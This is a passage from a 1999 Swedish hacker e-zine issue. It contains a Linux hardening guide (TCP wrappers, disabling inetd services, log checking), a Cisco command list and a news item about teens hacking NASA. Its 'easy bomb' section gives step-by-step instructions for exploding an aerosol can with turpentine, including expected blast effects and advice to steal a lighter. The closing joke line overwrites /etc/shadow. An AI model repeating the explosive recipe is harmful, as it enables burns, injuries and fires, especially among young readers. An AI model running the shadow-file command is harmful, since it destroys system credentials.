kan dock inte nås av andra andvändare, men det finns tekniker så att man kan rycka åt sig en skuggad passwd fil. Mer om Password Shadowing ses nedan. [Password Shadowing] Det första du ska kolla är att /etc/shadow finns, om inte så har du valt vid installationen att inte andvända password shadowing och då får du köra pkgtool och installera de själv. När du installerat pkgtool så fåru köra kommandona /usr/sbin/pwconv och /usr/sbin/grpconv. [TCP Wrappers] Note: Konfigurationen av TCP Wrappers är samma i alla dist. För det första måste du veta vad en TCP Wrapper är för nåt annars är det inte så bra, !LOL! jaja, en TCP Wrapper andvänds för att kunna styra vilka datorer som får andvända vilka tjänster. Detta finns definerat i /etc/inetd.conf. Det finns två filer som styr detta och det är /etc/hosts.deny och /etc/hosts.allow. Först ska jag gå igenom hur man låser datorn för alla utom ett antal IP nummer. Första steget är att öppna /etc/hosts.deny och skriva in raden ALL: ALL. För att ställa in vilka som får komma åt din dator editerar du /etc/hosts.allow och skriver in t.ex. ALL: 10.13.95.03. Istället för ALL så kan man skriva in t.ex. en pop3 server eller in.telnetd, t.ex. in.telnet.d: 10.13.95.03 eller pop3.ondska.org: IP. detta. Detta begränsar alltså vilka som får logga in på systemet och vilka som får läsa sin epost. Du kan också blockera olika IP-nummer men sen tillå- ta alla andra. Det gör du i /etc/hosts.deny. Editera hosts.deny och skriv t.ex: ALL: .hostname.com ALL: ipnummer [Anonymous FTP] Som standard är Anonym FTP påslagen efter installation. Om du tycker det är läskigt att vem som helst kan logga in som anonymous. Vilka som inte får logga in anges i /etc/ftpusers. Öppna bara /etc/ftpusers med emacs, vi, pico eller vad fan du vill och lägg till raderna anonymous och ftp. [0nda services] Det finns många services i Linux som skapar möjligheter, för att göra ditt system en aning säkrare så editerar du /etc/inetd.conf och sätter # framför alla läskiga tjänster. Slackware. För det första ska du studera indetd.conf noga och fundera vad datorn ska andvändas till och sen stänga av alla onödiga tjänster. Finger, shell, login, ntalk, systat och netstat bör stängas av och om du andvänder en äldre version av Slackware så är det också bra att stänga av imapd som va osäker. Telnet och ftp ska man ta och tänka lite om dom ska va på eller av, eftersom passwd skickas i klartext och kan enkelt sniffas. Om de verkligen absolut måste and- vändas..kolla så att du alltid håller den uppdaterad till senaste versionen. SSH (ftp.sunet.se/pub/security/tools/net) eller Kerberos (http://www.pdc.kth- .se/kth-krb) är iofs ett bättre alternativ eftersom allt krypteras vid överf- öringen. Om du inte fattade hur man stände av en tjänst så berättar jag igen, sätt en # framför den tjänst du vill stänga av och kör killall -HUP inetd för att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör undersökas där du kan stänga av olika tjänster. Redhat. /etc/inetd.conf har samma uppgift som i Slackware. att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör Gopher, shell, login, talk, ntalk, pop-2, pop-3. finger, time, linuxconf, imapd. Om du vill andvända pop-3 och imapd så se till att du uppgraderar till den senaste versionen. Som jag sa förut så skickar telnet o ftp passwdn i klartext, så om du vill andvända dem så är det bäst att andvända Secure Shell (SSH) eller Kerberos. Du stänger av tjänsterna genom att sätta en kommentar (#) framför dem och du uppdaterar inetd med killall -HUP inetd. För att stän- ga av andra onödiga tjänster kör /usr/sbin/setup och gå in på ntsysv. Stäng av allt som inte är nödvändigt och för att få information om de olika tjänst- erna så e det bara att trycka F1. [Loggfiler] Det enda sättet att kolla vad som händer på din dator så är det att kolla loggarna, visserligen finns det scripts som kan rensa dem men det är större chans att se vad som händer eller hinna det innan dom blir rensade om du kol- lar dom som en vana. I slackware ligger loggarna /var/log/messages och /var/log/syslog. Ge kommandot last dagligen också för att kolla vilka som loggat in på datorn. I Redhat ligger loggarna i /var/log/messages och /var/log/secure, sen e de också en bra ide att kolla vilka som loggat in på datorn med kommandot last. Det finns program som kan undersöka loggarna automatiskt, sånna kan man hitta på http://www.alw.nih.gov/Security/prog-monitor.html (Swatch och logsurfer) [Efterord] Jag vet att detta inte va den bästa artikeln, men information är alltid information. Om du undrar nåt eller vill ge credits (LOL) så maila keytrace@- usa.net ----------------------------------------------------------------------------- Cisco kommando lista ----------------------------------------------------------------------------- <1-99> - Session number to resume access-enable - Create a Temporary Access-List access-profile - Apply user-profile to interface clear - Reset functions connect - Open a terminal connection disable - Turn off privileged commands disconnect - Disconnect an existing network connection enable - Turn on privileged commands exit - Exit from the EXEC help - Description of the interactive help system lock - Lock the terminal Login - Login as an particular user logout - Same as 'exit' mrinfo - Request neighbor and version information from a multicast router mstat - Show statistics after multiple multicast tracerouter mtrace - Trace revers multicast path from destination to source name - connection - Name an existing network connection pad - Open a X.29 PAD connection ping - Send echo messages ppp - Start IETF point-to-point protocol (PPP) resume - Resume an active network connection rlogin - Open a rlogin connection show - Show running system information slip - Start serial-line (SLIP) systat - Display information about terminal lines telnet - Open a telnet connection terminal - Set terminal line parameters traceroute - Trace route to destination tunnel - Open a tunnel connection where - List active connections x28 - Become an x28 PAD x3 - Set x3 parameters on PAD ----------------------------------------------------------------------------- Ethernet kort till Windows CE ----------------------------------------------------------------------------- Xirom har kommit ut med ett litet batterisnålt Ethernet kort till Windows CE burkar. CompactCard Ethernet 10 so kortet heter är bara hälften så liten som ett vanligt PC kort och du kan ansluta dig med 10Mbps och kostar endast och jätte bara 1 255:- (exkl. moms) ..nä, mer än min veckopeng. Jag tror att man kan köpa den på ICA, fast kanske inte. http://www.xircom.com/compactcard/images/cfe-tr.gif http://www.xircom.com/compactcard/images/cfe-123.jpg http://www.xircom.com/compactcard/images/cfe-123.jpg ----------------------------------------------------------------------------- Svenska hackers hackade NASA, busted ! ----------------------------------------------------------------------------- 2 Svenska hackers gripna för intrång i NASAS jätte mega hemliga datorer. De två ungdomarna höll till i en Lägenhet på Söder där allt kretsade kring dato- rn. En av dom berättade att ta sig in i datorer va som en drog. Dom har bla. kommit över hemliga säkerhets listor och riskerar nu 2 års fängelse och skadestånd. *sörja* ----------------------------------------------------------------------------- Svin lätt & rolig Bomb ----------------------------------------------------------------------------- Ok, här kommer ett recept på en tämligen lätt bomb, det finns säkert andra versioner och former av denna bomb i andra zines. men här kommer den iaf: Vad du behöver: 1st Axe/hårspray/adidas liknande spray flaska. ½ flaska terpentin eller annan långbrinnade&lätt antändlig vätska Tändare/Tändstickor. Hur du gör: Häll lite terpentin på marken och lägg sedan burken på terpentin vätskan, häll nu på resten av terpentin flaskan över spray burken, järna lite runtom oxå. Tänd på och stick iväg ca 10-15meter. Effekt: Först när terpentinet har tagit eld och brunnit mellan 1-3 minuter så kommer en liten knall som oftast följs av en till knall och sedan explosionen som brukar vara ca 5ggr högre än knallarna, när explosionen kommer så blir det som ett typ svampmoln av eld ( typ atombomb ) som sträcker sej ca 1½-2 meter upp i luften. Tänk på att inte så för nära burken, för den kommer flyga i många delar, och terpentinet som ligger på kommer börja brinna på stället där burk flisorna landar. Vi gjorde denna bomb i skogen, det blev en grop i marken ca 10-15cm djup och fläckar med aska över allt inom 5-10 meters radie. Var hittar jag grejorna: Terpentin: färghandel, vissa mat affärer. Spray Flaska: Tänk själv ;) Tändare: Sno från din kedjerökande mamma eller i affären. //dthl ----------------------------------------------------------------------------- Copyright ----------------------------------------------------------------------------- Zinet för skickas över alla protokoll så länge du INTE ändrar det. Jag har satt en fet 1337 copyright på detta zine. Heretics Inc., Outlaw Informativa (C) ----------------------------------------------------------------------------- 3x1t3d(), eller nåt ----------------------------------------------------------------------------- Jopp, så va sagan slut som dom sa på Björnes Magazine. Jag hoppas att du inte sörjer. Tänk som min gamla farfar gjorde "0ndska är Kärlek" min farfar va en 0nd jävel. Nej !!! ...Slut på skitsnacket, ta ut snusen och gå och dö och sluta lyssna på mina dåliga skämt. # cat /ezine/o-i/outlaw-07 > /etc/shadow And the story ends... .-------------------------------------------------------------------------. | Heretics Inc. Outlaw Informativa issue #7, 22:45 1999-09-08 | '-------------------------------------------------------------------------' -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.0.2i iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q X3pmKDomoNWBQp8LyYIdwbqm =estT -----END PGP SIGNATURE-----